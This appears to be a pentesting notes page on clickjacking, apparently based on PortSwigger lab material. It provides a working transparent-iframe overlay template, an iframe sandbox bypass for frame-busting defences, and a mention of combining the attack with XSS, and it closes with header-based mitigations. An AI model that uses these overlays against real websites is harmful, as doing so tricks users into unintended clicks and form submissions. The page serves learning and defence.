Clickjacking

Clickjacking is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages.
-- Wikipedia

PortSwigger - Web Security Academy - Clickjacking (UI redressing)

Basic clickjacking attack

Just cover the target site by an overlay, like in follows. Or use Burp Suite's Clickbandit (Burp -> Burp Clickbandit). To prefill form data, just try appending params via url (GET).

<head>
	<style>
		#targetWebsite {
			position: relative;
			width: 800px;
			height: 600px;
			opacity: 0.00001;
			z-index: 2;
		}

		#decoyWebsite {
			position: absolute;
			top: 450px;
			left: 50px;
			width: 100px;
			height: 20px;
			z-index: 1;
		}
	</style>
</head>
<body>
	<div id="decoyWebsite">
	Click me
	</div>
	<iframe id="targetWebsite" src="https://website.com?param=value">
	</iframe>
</body>

Bypass frame detection

A common protection to avoid clickjacking is to try to detect, when a website is being framed. This can potentially be bypassed by using HTML5's sandbox iframe attribute, by specifing allow-forms, but omittin allow-scripts and allow-top-navigation.

...
<iframe sandbox="allow-forms" id="targetWebsite" src="https://website.com?param=value">
...

Combining with XSS

Sometimes you may be able to combine the attack with XSS, by e.g. providing an XSS exploit via prefilled form data.

Mitigation

Setting X-Frame-Options header to deny, sameorigin or allow-from <website>.
Using Content-Security-Policy: <policy> header, where <policy> should contain frame-ancestors being set to none, self or frame-ancestors <website>.

PreviousHost header attacks NextLogic flaws

Last updated 1 year ago